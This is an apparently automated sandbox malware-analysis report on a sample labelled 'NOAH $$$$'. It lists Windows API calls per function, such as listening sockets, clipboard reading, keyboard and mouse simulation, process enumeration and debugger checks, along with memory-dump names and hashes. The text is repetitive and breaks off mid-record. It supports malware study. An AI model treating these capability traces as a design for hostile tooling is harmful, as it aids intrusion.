                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$_strncmp
                                                                                                                                        • String ID: @oH$\$^$h
                                                                                                                                        • API String ID: 2175499884-3701065813
                                                                                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 540024437-0
                                                                                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                        • API String ID: 0-2872873767
                                                                                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2547909840-0
                                                                                                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                        • String ID: *.*$\VH
                                                                                                                                        • API String ID: 2786137511-2657498754
                                                                                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID: pqI
                                                                                                                                        • API String ID: 2579439406-2459173057
                                                                                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                        APIs
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicollmouse_event
                                                                                                                                        • String ID: DOWN
                                                                                                                                        • API String ID: 1033544147-711622031
                                                                                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3031425849-0
                                                                                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4170576061-0
                                                                                                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                        • IsIconic.USER32 ref: 0047A393
                                                                                                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 15083398-0
                                                                                                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
